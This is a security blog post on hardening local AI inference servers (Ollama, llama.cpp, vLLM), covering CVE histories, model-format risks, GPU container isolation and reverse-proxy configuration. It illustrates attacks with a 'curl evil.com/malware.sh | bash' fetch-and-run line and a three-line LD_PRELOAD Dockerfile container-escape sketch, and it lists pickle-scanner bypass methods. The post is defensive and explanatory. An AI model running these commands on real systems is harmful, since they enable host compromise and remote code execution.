Skip to main content
  1. Posts/

Securing Local AI Installations

Ender
Author
Ender
Cybersecurity pro by day, gamer and storyteller by night. I write about breaking systems, exploring worlds, and the tech that powers it all.
Table of Contents
AI Security - This article is part of a series.
Part 4: This Article
Securing Local AI Installations

175,000 Reasons to Read This Post
#

“Local AI is private AI.” That’s the pitch. Run your models on your own hardware, keep your data off someone else’s servers, maintain full control.

In January 2026, SentinelLabs and Censys published the results of a 293-day internet-wide scan. They found 175,108 Ollama instances exposed to the internet across 130 countries – no authentication, no encryption, full API access. Nearly half had tool-calling capabilities enabled, meaning attackers could execute code through them.

For context, when Cisco Talos ran a Shodan scan in September 2025, they found 1,139 exposed instances. Four months later, that number had grown 154x.

Inference servers aren’t the only local AI tools getting exposed. OpenClaw – the open-source AI agent formerly known as ClawdBot – hit 145,000 GitHub stars in its first week. Security researchers found over 30,000 exposed instances, a one-click RCE vulnerability (CVE-2026-25253), and 512 vulnerabilities in its initial audit – eight of them critical. Adoption outpaced security by weeks.

In Part 1 of this series, we covered the threat landscape. Part 2 locked down cloud infrastructure. Part 3 configured guardrails. This post covers the attack surface that’s growing fastest: local AI installations running on your own hardware with zero security out of the box.

We’ll go tool by tool – Ollama, llama.cpp, and vLLM – then cover the cross-cutting concerns: model supply chain security, container isolation for GPU workloads, and the network architecture that ties it together.

Quick Glossary
#

TermWhat It Means
GGUFGPT-Generated Unified Format – binary format for quantized models, used by llama.cpp and Ollama
SafetensorsHugging Face’s secure model format – stores only tensor data, no executable code
PicklePython’s serialization format – executes arbitrary code on load by design
QuantizationCompressing model weights (e.g., from 16-bit to 4-bit) to reduce memory and compute
vLLMHigh-throughput inference engine for production LLM serving
LLMjackingHijacking exposed AI endpoints to run inference on someone else’s compute bill
TEETrusted Execution Environment – hardware-isolated enclave for sensitive computation
LMStudioDesktop application for running local models – uses llama.cpp under the hood

That last entry matters. If you’re running LMStudio, Ollama, or any other GUI wrapper for local models, you’re almost certainly running llama.cpp underneath. The security posture of your GUI tool inherits the security posture of its engine.

The Local AI Threat Landscape
#

Running AI locally eliminates cloud-specific risks: no data leaving your network, no provider access to your prompts, no API key sprawl. But it introduces three categories of risk that most operators aren’t thinking about.

Category 1: Network Exposure
#

The 175,108 exposed Ollama instances aren’t a bug in Ollama. Ollama actually binds to 127.0.0.1 (localhost only) by default. The problem is what happens next: every deployment guide, Docker tutorial, and cloud setup script tells you to set OLLAMA_HOST=0.0.0.0 for remote access. Once you do that – and 175,000 people have – you’re running a model inference server on the public internet with zero authentication.

GreyNoise deployed honeypots and captured 91,403 attack sessions targeting AI endpoints between October 2025 and January 2026:

  • SSRF campaign: 62 IPs across 27 countries exploited Ollama’s model pull functionality. Christmas Day 2025 saw a spike of 1,688 sessions in 48 hours.
  • Enumeration campaign: Starting December 28, 2025, just two IPs generated 80,469 sessions over 11 days, systematically probing 73+ model endpoints. GreyNoise assessed this as a “professional threat actor building target lists.”

The incentives are obvious. Sysdig’s LLMjacking research showed that hijacked AI compute can cost victims $46,000 per day for Claude 2.x abuse. Their follow-up report found costs scaling to over $100,000 per day with Claude 3 Opus. That’s per day, per compromised endpoint.

Criminal infrastructure around LLMjacking is maturing fast. Pillar Security documented Operation Bizarre Bazaar – the first attributed LLMjacking campaign with a full commercial marketplace. The operation runs three components: a scanner that finds exposed AI endpoints, a validator that tests endpoint quality, and a marketplace that resells access. Between December 2025 and January 2026, it generated 35,000 attack sessions targeting 30+ LLM providers. This isn’t opportunistic – it’s industrialized.

If you’re running a local AI endpoint that’s reachable from the internet, someone is already scanning for it. The GreyNoise data proves this isn’t hypothetical.

Category 2: Model Supply Chain
#

Over 80% of models on Hugging Face use pickle-serialized formats. Pickle executes arbitrary code during deserialization — the __reduce__ method allows any callable to run when a pickle file is loaded (Trail of Bits). Even “safe” formats aren’t immune to parser bugs. GGUF doesn’t execute code by design, but Cisco Talos found heap overflow vulnerabilities in the GGUF parser that could lead to code execution via malicious model files.

Category 3: Container Escape
#

If you’re running AI workloads in Docker (and most people are), the container boundary is thinner than you think. CVE-2025-23266 – dubbed “NVIDIAScape” – demonstrated container escape from GPU workloads in three lines of Dockerfile. The NVIDIA Container Toolkit trusted unfiltered environment variables, allowing attackers to force the host to load a malicious library.

Hardening Ollama
#

Ollama is the most popular tool for running local models. It’s also the most exposed. With 175,108 internet-facing instances and a growing CVE list, hardening Ollama is the highest-priority action for most readers.

What Ships Broken
#

SettingDefaultSecurity Impact
Bind address127.0.0.1Safe – localhost only
Port11434Known target for scanners
AuthenticationNoneNo API keys, no user management, no rate limiting
TLSNoneAll traffic in cleartext
Model pullUnrestrictedAnyone with API access can pull/push models

The bind address ships safe. The problem is that Ollama has zero authentication mechanism. The moment you change the bind address to 0.0.0.0 for remote access, you’re exposing a completely unauthenticated API. There’s no --api-key flag, no --auth configuration. As of early 2026, authentication is an open feature request. CVE-2025-63389 (CVSS 9.8) formally codified this gap.

Docker compounds this. Ollama’s official Docker image historically defaults to 0.0.0.0 (the container needs external connectivity). Combined with running as root inside the container, this meant the Probllama path traversal (CVE-2024-37032) was trivially exploitable for full RCE in Docker deployments.

CVE History
#

CVECVSSDescriptionFixed In
CVE-2024-370329.1“Probllama” – Path traversal via malformed digest in /api/pull enables RCE0.1.34
CVE-2024-397208.2Out-of-bounds read via /api/create with malformed GGUF causes crash0.1.46
CVE-2025-633899.8Missing authentication enables unauthorized model managementPost-0.12.3
CVE-2025-51471Cross-domain token exposure via manipulated WWW-Authenticate header0.6.7+
CVE-2024-397197.5File existence disclosure via /api/create error messages0.1.47
CVE-2024-397217.5DoS via resource exhaustion through /api/create0.1.34
CVE-2024-397227.5Path traversal in /api/push exposes directory structure0.1.46

The Probllama vulnerability (CVE-2024-37032) exploited insufficient validation of the SHA256 digest format in model pull requests. An attacker running a rogue registry server could respond with path traversal payloads, achieving arbitrary file overwrite. In Docker – where Ollama runs as root and historically listened on 0.0.0.0 – this was trivially exploitable for full RCE. Wiz’s writeup has the technical details.

The Oligo Security research that produced CVE-2024-39719 through CVE-2024-39722 found four distinct vulnerabilities in a single audit, all exploitable via single HTTP requests. This is what happens when a tool designed for local development gets deployed as a network service.

Hardening Checklist
#

1. Never expose Ollama directly to a network. Put it behind a reverse proxy with authentication.

# Keep Ollama on localhost
export OLLAMA_HOST=127.0.0.1:11434
# Use a reverse proxy (nginx/caddy) with auth -- see Network Architecture section

2. If you must allow remote access, use a VPN or mesh network. Tailscale’s blog explains why. Their setup guide walks through the full Ollama + Open WebUI + Tailscale stack.

3. Keep Ollama updated. Run ollama --version and compare against releases. Seven CVEs in 18 months means falling behind on patches is a real risk.

4. Restrict model sources. Don’t pull models from untrusted registries. In production, block outbound connections to external model registries at the network level.

5. Monitor API usage. Ollama doesn’t log API calls by default. Run it behind a reverse proxy that logs all requests. Unusual patterns – high request rates, requests to /api/pull, connections from unexpected sources – are early indicators of compromise.

6. If running in Docker:

# Bad: exposes on all host interfaces
docker run -p 11434:11434 ollama/ollama

# Better: bind only to localhost
docker run -p 127.0.0.1:11434:11434 ollama/ollama

# Best: internal Docker network + reverse proxy
docker network create --internal ollama-net
docker run --network ollama-net ollama/ollama

Limitations
#

Ollama was not designed for production deployment. It lacks authentication, TLS, rate limiting, access logging, and multi-tenancy — none of these exist. The Ollama team is aware of the gap, but as of early 2026, the tool assumes a trusted, single-user, localhost-only environment. For anything beyond that, you need to wrap Ollama in infrastructure that provides what it doesn’t.

Hardening llama.cpp (and LMStudio)
#

llama.cpp is the C/C++ inference engine that powers most local model tools. If you’re running LMStudio, you’re running llama.cpp. If you’re running Ollama, you’re running a fork that includes llama.cpp.

I run LMStudio for local model testing. It’s a great tool – clean UI, easy model management, one-click serving. But when I started looking at the CVE list for its underlying engine, I realized the GUI was giving me a false sense of security. The friendly interface doesn’t change what’s running underneath.

The Server Security Model
#

SettingDefaultSecurity Impact
Bind address127.0.0.1Safe – localhost only
AuthenticationOptional --api-key flagAvailable but not enabled by default
TLSNoneCleartext by default
RPC serverDisabledWhen enabled, listens for tensor operations with no auth

CVE History
#

CVECVSSDescriptionFixed In
CVE-2024-343599.6“Llama Drama” – SSTI via Jinja2 chat templates in GGUF metadata enables RCE (affects llama-cpp-python)llama-cpp-python 0.2.72
CVE-2024-424799.8Write-what-where in RPC set_tensor enables arbitrary memory write and RCEb3561
CVE-2024-424789.8Arbitrary memory read in RPC get_tensorb3561
CVE-2024-218258.8GGUF parser heap overflow in type array/string parsingPost-18c2e17
CVE-2024-234968.8GGUF parser heap overflow in header parsingPost-18c2e17
CVE-2025-53630HighInteger overflow in GGUF parser leads to heap OOB read/writeCommit 26a48ad

Two findings from that audit matter most. The RPC server vulnerabilities (CVE-2024-42479/42478) gave attackers arbitrary memory read and write against any instance with the RPC server enabled. And the GGUF parsing vulnerabilities (three distinct heap overflow paths) mean downloading a GGUF model from an untrusted source is not risk-free just because “it’s not pickle.”

CVE-2024-34359 – “Llama Drama” – affected llama-cpp-python (the Python bindings). GGUF models can contain Jinja2 chat templates in metadata. When loaded by vulnerable llama-cpp-python versions, these templates executed arbitrary code via SSTI. Over 6,000 models on Hugging Face were susceptible. GGUF itself doesn’t execute code, but the code that parses GGUF metadata can.

Hardening Checklist
#

1. Keep LMStudio and all GUI tools updated. LMStudio bundles llama.cpp – when llama.cpp gets a security patch, update LMStudio to get it. Compare against llama.cpp releases.

2. Don’t enable the RPC server unless you need it. If you do, restrict it to trusted networks and patch to at least build b3561.

3. Use --api-key when running llama-server:

llama-server --model model.gguf --api-key "your-secret-key-here"

4. Only load GGUF models from trusted sources. Verify checksums. Prefer models from known publishers with established track records. If you use llama-cpp-python, update to >= 0.2.72 to mitigate the Llama Drama SSTI vulnerability.

Hardening vLLM
#

vLLM is the production-grade inference engine – high throughput, tensor parallelism, efficient batching. It’s also the tool with the most dangerous CVE in this entire post.

What Ships Broken
#

SettingDefaultSecurity Impact
API server0.0.0.0:8000Exposed on all interfaces by default
AuthenticationOptional --api-keyAvailable but not default
ZeroMQ sockets0.0.0.0 when Mooncake enabledUnauthenticated, accepts pickle
Model loadingtrust_remote_code=FalseBypassable via auto_map

That first row is the critical difference. vLLM binds to 0.0.0.0 by default – start vllm serve without specifying a host and your inference API is immediately network-accessible.

CVE History
#

CVECVSSDescriptionFixed In
CVE-2025-3244410.0Pickle deserialization RCE via Mooncake integration over unauthenticated ZeroMQ0.8.5
CVE-2025-664488.8RCE via auto_map entries in model config bypasses trust_remote_code=False0.11.1
CVE-2025-621648.8Memory corruption via unsafe tensor deserialization in Completions API0.11.1

CVE-2025-32444 is a perfect 10.0 CVSS. vLLM’s Mooncake integration used pickle.loads() to deserialize data over unauthenticated ZeroMQ sockets on 0.0.0.0. Any attacker on the network could achieve arbitrary code execution with zero credentials.

The auto_map vulnerability (CVE-2025-66448) is equally concerning from a supply chain perspective. Even with trust_remote_code=False, vLLM’s model config loading would fetch and execute arbitrary Python from remote repositories if the config contained an auto_map entry. The mechanism: get_class_from_dynamic_module() downloads and imports Python code without checking the trust flag. A malicious model config on Hugging Face could achieve RCE on any vLLM instance that loaded it, regardless of trust settings.

CVE-2025-62164 rounds out the picture: user-supplied prompt embeddings loaded via torch.load() without validation could trigger out-of-bounds memory writes. Any user who can send requests to the Completions API could crash the server or potentially achieve code execution.

Hardening Checklist
#

1. Bind to localhost: vllm serve model-name --host 127.0.0.1 --port 8000

2. Enable API key authentication: vllm serve model-name --api-key "your-secret-key-here"

3. If using Mooncake, update to >= 0.8.5 immediately. Update to >= 0.11.1 for the auto_map fix.

4. Never run with trust_remote_code=True on untrusted models.

5. Network-isolate the inference cluster. vLLM’s distributed components (ZeroMQ, NCCL) should never be accessible from outside the cluster.

Cross-Tool Comparison
#

CapabilityOllamallama.cppvLLM
Default bind127.0.0.1127.0.0.10.0.0.0
Built-in authNone--api-key flag--api-key flag
Built-in TLSNoneNoneNone
Model formatGGUFGGUFSafetensors, pickle, GGUF
Critical CVEs7+6+4+
Needs reverse proxyYes (mandatory)Yes (recommended)Yes (mandatory)

The common thread: none of these tools ship with production-grade security. All three need a reverse proxy for authentication and TLS. All three have had critical RCE vulnerabilities. The difference is degree – Ollama has no auth mechanism at all, llama.cpp has a basic one, and vLLM has one but defaults to binding on all interfaces. Plan accordingly.

Model Supply Chain Security
#

Every tool in the previous sections loads model files. Those files are the new attack vector.

The Pickle Problem
#

Python’s pickle format executes arbitrary code during deserialization. This is the serialization mechanism, not a flaw in it — the __reduce__ method allows any callable to run when a pickle file is loaded. Over 80% of models on Hugging Face use pickle-serialized formats.

An attacker embeds a reverse shell, a crypto miner, or a data exfiltrator in the model weights – the code runs the instant the model loads. Researchers cataloged dozens of pickle-based model loading paths across five foundational frameworks (PyTorch, TensorFlow, Keras, Scikit-learn, and Hugging Face Transformers). Loading an untrusted pickle model is functionally equivalent to running curl evil.com/malware.sh | bash. There is no way to make pickle “safe.”

The Safetensors Solution
#

Safetensors stores only tensor data – no executable code, no deserialization hooks. Trail of Bits audited the format and found no critical security flaw leading to code execution. Hugging Face is making it the default format, though migration is incomplete.

One second-order risk: HiddenLayer discovered a “Silent Sabotage” attack targeting the safetensors conversion pipeline – attackers can intercept models during format conversion even if the destination format is safe. Always verify the final artifact independently.

The GGUF Middle Ground
#

GGUF is structurally safer than pickle – no __reduce__ equivalent. But parser bugs can still achieve code execution (CVE-2024-21825, CVE-2024-23496, CVE-2025-53630), and metadata can be weaponized (CVE-2024-34359 – Jinja2 SSTI). A safe container format means nothing if the parser that opens it has heap overflows.

The Scanner Arms Race
#

Hugging Face runs PickleScan on uploaded models. Researchers have achieved 100% bypass rates through multiple techniques:

Bypass MethodHow It WorksSource
Broken pickle format7z compression instead of ZIP evades scanningReversingLabs
Alternative opcodesBdb.run or asyncio gadgets outside the blacklistCheckmarx
Parser discrepancyDifferences between PickleScan parsing and Python executionSonatype
ZIP flag manipulationAltered flags prevent detection of malicious filesJFrog

ProtectAI’s scanning partnership with Hugging Face has scanned 4.47 million model versions and found 352,000 issues across 51,700 models. Blacklist-based scanning of an inherently executable format is a losing game. The real answer is format migration.

Model Format Comparison
#

PropertyPickleSafetensorsGGUF
Code execution by designYesNoNo
Parser vulnerabilitiesN/A (code runs intentionally)None found (audited)Multiple heap overflows
Metadata risksN/AMinimalJinja2 SSTI in templates
Recommended for untrusted sourcesNeverYesWith updated parser only

Model Verification Pipeline
#

1. Prefer safetensors. No amount of scanning makes pickle safe – format migration eliminates the risk class entirely.

2. Verify provenance with Sigstore. The OpenSSF Model Signing specification provides cryptographic signing backed by transparency logs. The sigstore/model-transparency project has reached v1.0:

pip install model-signing
model_signing sign ./my-model/ --signature my-model.sig
model_signing verify ./my-model/ --signature my-model.sig \
  --identity "signer@example.com" --identity-provider https://accounts.google.com

3. Scan pickle files with multiple tools if you must use them – PickleScan and ProtectAI’s Guardian.

4. Load untrusted models in sandboxed environments. Container isolation prevents a malicious model from compromising the host.

5. Pin model versions and checksums. Don’t auto-update models in production.

Container Isolation for GPU Workloads
#

Docker’s isolation model has a fundamental weakness for GPU workloads. The NVIDIA Container Toolkit punches through the container boundary, and it has been repeatedly compromised:

CVECVSSDescriptionImpact
CVE-2024-01329.0TOCTOU vulnerability allows container escapeFull host compromise
CVE-2025-233598.3Bypass of CVE-2024-0132 patch via symlink raceHost root filesystem mount
CVE-2025-232669.0“NVIDIAScape” – Container escape via LD_PRELOAD in 3-line DockerfileRoot on host

The NVIDIAScape exploit is the one to internalize. Wiz Research demonstrated that by setting LD_PRELOAD in a Dockerfile, the nvidia-ctk hook loads that library during container creation, executing attacker code on the host with root:

FROM nvidia/cuda:12.0-base
ENV LD_PRELOAD=/path/to/malicious.so
# That's it. Container escape on creation.

Three lines. Full escape. Three rounds of patch-and-bypass in 10 months. Docker with the NVIDIA Container Toolkit is reasonable for development. It is not a security boundary for multi-tenant environments.

Three Defense Layers
#

Layer 1: Hardened Container Runtime. Update NVIDIA Container Toolkit to >= 1.17.8, then:

docker run --user 1000:1000 --cap-drop ALL --cap-add SYS_PTRACE \
  --read-only --tmpfs /tmp --gpus all your-ai-image

Layer 2: Sandbox Runtime. For workloads that need stronger isolation than standard Docker:

gVisor with nvproxy provides application-level sandboxing – it intercepts syscalls and implements a user-space kernel, while nvproxy forwards GPU ioctl calls to the host driver. Supports CUDA on T4, L4, A100, and H100 GPUs. Run with docker run --runtime=runsc --gpus all your-ai-image. The key limitation: GPU ioctl commands pass through to the host driver, so it’s not a full isolation boundary against driver-level exploits.

Kata Containers provides VM-level isolation via lightweight micro-VMs. Each container runs in its own virtual machine with a dedicated kernel, so a container escape compromises the micro-VM – not the host. GPU passthrough is supported with NVIDIA GPU Operator integration. Higher overhead than gVisor but substantially stronger isolation.

Edera takes a different approach: a Type-1 hypervisor providing per-container micro-VMs (“zones”) with GPU isolation, claiming performance within 5% of native containers. Sits below the OS – stronger than gVisor, Kubernetes-compatible.

Layer 3: Confidential Computing. For the highest security requirement – protecting model weights and inference data from even the infrastructure operator:

NVIDIA H100 GPUs support hardware-based TEE with on-die root of trust, AES-GCM-256 encrypted CPU-GPU transfers, and cryptographic attestation. Performance impact is below 7% for typical LLM inference. Requires CPU TEE (AMD SEV-SNP or Intel TDX) and is available in major cloud providers. This integrates with Kata for confidential containers in Kubernetes. Google Cloud offers this as Confidential Accelerators.

Isolation Comparison
#

ApproachIsolation LevelGPU SupportOverheadBest For
Docker + NVIDIA ToolkitProcess/namespaceFull~0%Development, trusted workloads
gVisor + nvproxySyscall interceptionCUDA (T4/L4/A100/H100)LowUntrusted models, multi-tenant
Kata ContainersMicro-VMGPU passthroughModerateHigh-security production
EderaType-1 hypervisorGPU isolation~5%Kubernetes GPU workloads
NVIDIA H100 CCHardware TEEFull (H100/H200)<7%Regulatory, confidential data

Network Architecture
#

The tools don’t provide security. Your network must.

Reference Architecture
#

Reference Architecture

Reverse Proxy Configuration (Caddy)
#

# Requires caddy-ratelimit plugin: xcaddy build --with github.com/mholt/caddy-ratelimit
ai.internal.example.com {
    basicauth {
        admin $2a$14$... # bcrypt hash
    }
    rate_limit {
        zone dynamic {
            key    {remote_host}
            events 60
            window 1m
        }
    }
    reverse_proxy localhost:11434
    log {
        output file /var/log/caddy/ai-access.log
        format json
    }
}

nginx gives you more control. The key addition is blocking model management endpoints so even authenticated users can only run inference:

# This directive must be in the http {} block, not inside server {}
limit_req_zone $binary_remote_addr zone=ai:10m rate=30r/m;

server {
    listen 443 ssl;
    server_name ai.internal.example.com;
    ssl_certificate /etc/nginx/ssl/cert.pem;
    ssl_certificate_key /etc/nginx/ssl/key.pem;

    auth_basic "AI Endpoint";
    auth_basic_user_file /etc/nginx/.htpasswd;

    location / {
        limit_req zone=ai burst=10;
        proxy_pass http://127.0.0.1:11434;
    }

    # Block model management endpoints
    location ~ ^/api/(pull|push|delete|create) {
        return 403;
    }
}

Network Segmentation
#

For multi-machine setups, segment into four networks: inference API (TLS, auth, rate-limited – only network clients reach), backend (isolated VLAN for ZeroMQ/NCCL inter-node traffic), management (SSH, monitoring, accessible only via bastion/VPN), and model storage (controls which registries are reachable).

For single-machine setups (most Ollama and LMStudio users): keep everything on 127.0.0.1. If you need remote access, use Tailscale or WireGuard rather than exposing ports.

Monitoring
#

None of these tools provide adequate logging on their own. The reverse proxy is your primary logging layer. At minimum, alert on:

# Check for unexpected listeners on AI ports
ss -tlnp | grep -E ':(11434|8000|8080|1337)'

# Watch for connections from unexpected sources
ss -tnp | grep -E ':(11434|8000)'
SignalWhat It Means
Request rate spikePotential LLMjacking – someone is using your compute
Requests to /api/pull or /api/pushModel manipulation attempt
Error rate spikePotential fuzzing or exploitation attempt
New outbound connections from AI serverPossible SSRF or compromised model callbacks

The GreyNoise data shows attackers start with enumeration (probing endpoints to see what’s running), then move to exploitation. Detecting the enumeration phase gives you time to respond before exploitation begins.

What To Do Now
#

Today (15 minutes)
#

# Check what's listening on common AI ports
ss -tlnp | grep -E ':(11434|8000|8080|1337)'
# If you see 0.0.0.0 instead of 127.0.0.1 -- fix it now

# Check tool versions against CVE tables above
ollama --version          # < 0.12.3 = CVE-2025-63389 (CVSS 9.8)
llama-server --version    # < b3561 = CVE-2024-42479 (CVSS 9.8)
nvidia-ctk --version      # < 1.17.8 = container escape CVEs

This Week
#

  • Put a reverse proxy in front of every AI endpoint with TLS and authentication. The Caddy and nginx configs in the Network Architecture section are ready to adapt. No exceptions – every request to an AI backend must pass through a layer that authenticates and logs.
  • Audit your model sources. Where did your GGUF files come from? Are you using pickle models? Create a list of every model file on every machine running AI inference. For each one, document the source, format, and when it was last updated.
  • Update NVIDIA Container Toolkit to >= 1.17.8 if running GPU workloads in Docker. CVE-2025-23266 is a 3-line container escape.
  • Block model management endpoints (/api/pull, /api/push, /api/delete, /api/create) at the proxy level.

This Month
#

  • Implement model verification. Set up a process for verifying model provenance before deployment. Start with SHA-256 checksums of every model file in production. Evaluate Sigstore model signing for cryptographic verification – the tooling is at v1.0 and integrates with major model registries.
  • Migrate from pickle to safetensors where possible. Audit every model in your pipeline: what format is it in? If pickle, is a safetensors version available? The Hugging Face Hub lists available formats for each model. For models that only exist in pickle, load them exclusively in sandboxed environments.
  • Evaluate container isolation for production GPU workloads. The decision tree: standard Docker for development, gVisor with nvproxy for untrusted models, Kata Containers for high-security, and NVIDIA H100 CC for regulatory compliance.
  • Set up a vulnerability monitoring feed. Subscribe to security advisories for the tools you use: Ollama, llama.cpp, vLLM, NVIDIA. The CVE velocity in this space means quarterly reviews aren’t enough.

Series Wrap-Up
#

This is the final post in the AI Security series. When I started writing Part 1 in January, the Cisco Talos study showing 1,139 exposed Ollama instances was the headline number. By the time I’m publishing Part 4, that number has grown to 175,108. The criminal infrastructure around LLMjacking went from proof-of-concept to a commercial marketplace. Three NVIDIA Container Toolkit escape vulnerabilities have been disclosed and patched. The vLLM project shipped its first CVSS 10.0 vulnerability. This is the pace of AI security in 2026.

The series arc:

The single takeaway from the entire series: the defaults are not safe. Every layer of the AI stack requires deliberate hardening. The 175,108 exposed Ollama instances aren’t careless operators — they’re people who installed a tool and didn’t know the defaults would betray them. Don’t be number 175,109.

Staying Current
#


Further Reading
#

Tool Documentation:

Vulnerability Research:

Supply Chain Security:

Container & GPU Isolation:

Threat Intelligence:

Series Navigation:

AI Security - This article is part of a series.
Part 4: This Article

Related

Words of Radiance, an Instant Top 10 Epic Fantasy

The long anticipated sequel and book 2 of the Stormlight Archive hit stores march 4th. It picks up right were we left off, the assassin in white has decapitated the leadership of Roshar and targets Dalinar Kholin the blackthorn and true power behind the Alethi kingship. While the first book of any epic fantasy series needs to build the world, the second book needs to make us care about the characters. If you have read fantasy for long enough nearly everyone reads “this big book that goes nowhere.” The second book in the series needs to be paced particularly well to keep the reader engaged and show significant character development. Words of Radiance has it in spades.

7-Science Fiction and Fantasy Novels for your 2014 reading list.

Words of Radiance, March 4th # Book 2 of the Stormlight Archive. the highly anticipated sequel to The Way of Kings is at the top of my personal list. Bringing us back to the world filled with Spren as the war against the Parshendi escaltes on the shattered plains, and with the assassin in white gutting nobility and power all over the world is now targeting Dalinar the arguably the real power behind the Alethi throne. Kaladin, who has sworn to protect Dalinar and the king, is struggling to master his new windrunner powers while keeping them secret, has also been elevated from a branded slave to the new royal guard commander. For more information on this series check out our review here.